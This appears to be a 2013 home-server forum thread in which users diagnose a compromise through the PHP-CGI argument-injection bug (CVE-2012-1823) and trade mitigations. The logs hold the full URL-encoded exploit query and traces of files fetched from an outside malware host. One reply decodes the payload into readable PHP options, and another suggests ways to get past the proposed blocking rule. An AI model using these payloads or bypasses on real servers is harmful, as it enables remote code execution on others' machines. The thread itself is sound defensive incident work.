[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 100%
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]   456K
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] =0.08s
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 2013-10-30 14:19:34 (456 KB/s) - `a.c' saved [38100/38100]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] a.c:169: warning: conflicting types for built-in function 'pow'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] rm:
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] cannot remove `/var/log/syslog'
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] touch:
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] cannot touch `/var/log/syslog'
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] : Permission denied
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] chmod:
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] changing permissions of `/var/log/syslog'
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] : Operation not permitted
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] chattr
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] :
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] Permission denied
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] while reading flags on /var/log/syslog
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] %
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] T
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] o
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] t
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] a
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] l
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] %
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] R
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] e
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] c
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] e
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] i
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] v
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] e
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] d
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] %
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] X
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] f
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] e
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] r
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] d
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] \r
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 2
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 6
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 4
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 2  100 27642    0     0   116k      0 --:--:-- --:--:-- --:--:--  169k
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] ./.a: 1:
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] Syntax error: "(" unexpected
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] --2013-10-30 14:19:36--  http://stablehost.us/botsb
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] Resolving stablehost.us...
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 93.114.170.129
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80...
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] connected.
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response...
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 404 Not Found
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 2013-10-30 14:19:36 ERROR 404: Not Found.
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] \r
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 6
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 8
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 6
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 4
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 6
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 9
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]     0   593k      0  0:00:01 --:--:--  0:00:01  653k
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] \r
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 8
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 1
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 7
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 5
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 8
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] k
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] 0
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]     0   589k      0  0:00:01  0:00:01 --:--:--  626k
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] ./.b: 1:
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] \x7fELF\x01\x01\x01\x03\x02\x03\x01\xe0\x81\x04\b48\xbd: not found
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] ./.b: 2:
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] Syntax error: "(" unexpected
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Wed Oct 30 14:19:39 2013] [error] [client 15.185.117.126] script not found or unable to stat: /usr/lib/cgi-bin/php4
access.log:

Code: Select all

15.185.117.126 - - [30/Oct/2013:13:27:58 +0000] "HEAD / HTTP/1.0" 200 278 "-" "-"

15.185.117.126 - - [30/Oct/2013:14:09:26 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 535 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:33 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 347 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:38 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:38 +0000] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:39 +0000] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 489 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
Obviously, I want to close whatever hole was used here but Google hasn't really brought anything up. How was Apache tricked into downloading a file to my server?
Last edited by RandomUsername on 07 Nov 2013, 06:42, edited 2 times in total.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:04

if you translate the url you get

Code: Select all

POST /cgi-bin/php-cgi -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
apparantly your cgi-bin/php allow config commands to be given on the URL. After this it seems to run arbitrary commands directly onto the URL. Some fail and become errors. So, your php allows remote execution as well. I guess there is a setting to prevent this. I guess those are the items listed above. So first your virus opened up php by passing arbitrary configuration parameters, which then allowed it to execute arbitrary code from the URL.
Last edited by Ubi on 31 Oct 2013, 10:15, edited 1 time in total.

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:10

Ah, OK. Thanks for that. I don't think I've ever changed that so I wonder if it's a default setting on the B3.

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:16

This is in my sites-enabled/bubba file:

Code: Select all

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>
Is the "allow from all" line the problem? Should I change it to "Deny from all"? I'm wondering if the admin web interface uses cgi and that's why it's enabled.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:17

its a serious issue, PHP shouldnt allow config to be set outside of the main php.ini.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:17

heres the exploit and description

http://www.exploit-db.com/exploits/29290/

My B3 is running PHP Version: 5.3.3-7+squeeze4ex1 and is thus vulnerable
I guess other people have this problem too.

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:22

Thanks. I notice that was only posted a couple of days ago so is this a fairly new exploit? Is mitigation only possible by patching Apache as implied by that article?

I've set the ScriptAlias section to "deny from all" as I mentioned above, will that do the trick do you think?

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:34

It is not a new exploit, it is over a year old. Just this iteration is new.

from http://stopmalvertising.com/security/se ... tives.html

Code: Select all

# PHP-CGI Remote Code Execution Bug (CVE-2012-1823)
# The directive below will help against the 
# PHP-CGI Remote Code Execution Bug (CVE-2012-1823) 
# discovered on the 3rd May 2012 by Security Researchers from Eindbazen
# PHP-CGI Vulnerability
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]
I have not tested this myself .

THe guts of the matter are here:
http://eindbazen.net/2012/05/php-cgi-ad ... 2012-1823/

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:54

Where should I be putting that rule? In /etc/apache2/conf.d/admin.conf ?

Gordon
Posts: 1287
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon » 31 Oct 2013, 12:07

Ubi wrote:It is not a new exploit, it is over a year old. Just this iteration is new.

from http://stopmalvertising.com/security/se ... tives.html

Code: Select all

# PHP-CGI Remote Code Execution Bug (CVE-2012-1823)
# The directive below will help against the 
# PHP-CGI Remote Code Execution Bug (CVE-2012-1823) 
# discovered on the 3rd May 2012 by Security Researchers from Eindbazen
# PHP-CGI Vulnerability
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]
I have not tested this myself .

THe guts of the matter are here:
http://eindbazen.net/2012/05/php-cgi-ad ... 2012-1823/
I wonder if that regex will catch every attempt. If the perpetrator replaces one %3D instance to '=' he'll go straight past this blocking rule.

This whole thing seems like a serious issue though. I should probably check my logs for similar attempts and maybe add another string match rule to my firewall.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 14:45

If I understand the regexp, it specifically attacks the first %2d in the querystring, which pretends to be an execution flag for the php process. This particular primary %2d is the key to the exploit. But I fully agree on your assessment. However, considering this thing is executed by 31337 scriptkiddies I assume you reduce the threat by 95% by this rule. It certainly is not a cure, and should be addressed by the maintainer.

It's interesting, this is actually the first real remote-execution exploit for the B3 ever afaik.

Gordon
Posts: 1287
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon » 01 Nov 2013, 06:00

According to Eindbazen the "-" does not need to be url encoded. Writing "%2d" is just to hide what they're doing from less educated people. And if I understand correctly the exploit will also work if the query string is prefixed with one or more space characters, i.e. %20 but possibly also %09.

Less chance of me getting infected BTW. On my defaulthost entry I have overruled /cgi-bin/ to a different location that contains no scripts, so they'll need to access one of the named hosts. So far the logs show that all the fishy stuff targets the default host only and I'm okay with that.

DanielM
Posts: 637
Joined: 28 Mar 2008, 06:37
Location: Sweden

Re: I have been attacked and don't know why.

Post by DanielM » 01 Nov 2013, 07:52

Ok. This is weird. It happened to me too. I've been struggling for hours today to try to find out what happened and now I found this thread.

I noticed this morning that my usual www-data crontab stuff (I do some homeautomation related stuff) didn't run and when I checked www-datas crontab was replaced with a one running /tmp/.UNIX/update every minute. The entire /tmp/.UNIX directory contains only strange stuff, some of it created yesterday evening and some as old as 2002 (which I guess assumes the file dates aren't real). Followed the scripts and what is really happening is that a binary with the name /tmp/.UNIX/syslogging is called (no idea what it does). Fixed the crontab now and I'll clear out /tmp and reboot, just want to do some investigation first. Just wondering how they got in, is this the same way in as in RandomUsernames B3? And if so, is it a coincidence that it's happening at almost the same time?

Anyway, some snippets from my Apache logs:

error.log

Code: Select all

[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150]
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled.  This
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] means that a page will only be served up if the REDIRECT_STATUS CGI variable is
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] set, e.g. via an Apache Action directive.</p>
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p>
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <p>For more information about changing this behaviour or re-enabling this webserver,
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] consult the installation file that came with this distribution, or visit
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <a href="http://php.net/install.windows">the manual page</a>.</p>
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] Premature end of script headers: php
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150]
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled.  This
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] means that a page will only be served up if the REDIRECT_STATUS CGI variable is
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] set, e.g. via an Apache Action directive.</p>
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p>
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <p>For more information about changing this behaviour or re-enabling this webserver,
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] consult the installation file that came with this distribution, or visit
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] <a href="http://php.net/install.windows">the manual page</a>.</p>
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] Premature end of script headers: php5
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Thu Oct 31 19:31:39 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Thu Oct 31 19:31:40 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php4
[Thu Oct 31 20:15:12 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Thu Oct 31 20:15:12 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Thu Oct 31 20:15:12 2013] [error] [client 208.84.156.150] script not found or unable to stat: /usr/lib/cgi-bin/php4
[Fri Nov 01 00:21:51 2013] [error] [client 5.79.78.230] script not found or unable to stat: /usr/lib/cgi-bin/php4
Usage: at [-V] [-q x] [-f file] [-mldbv] timespec ...
       at [-V] [-q x] [-f file] [-mldbv] -t time
       at -c job ...
       atq [-V] [-q x]
       atrm [-V] job ...
       batch
warning: commands will be executed using /bin/sh
access.log

Code: Select all

208.84.156.150 - - [31/Oct/2013:19:31:38 +0100] "GET //cgi-bin/php HTTP/1.1" 500 640 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:39 +0100] "GET //cgi-bin/php5 HTTP/1.1" 500 640 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:39 +0100] "GET //cgi-bin/php-cgi HTTP/1.1" 404 470 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:39 +0100] "GET //cgi-bin/php.cgi HTTP/1.1" 404 470 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
208.84.156.150 - - [31/Oct/2013:19:31:40 +0100] "GET //cgi-bin/php4 HTTP/1.1" 404 469 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
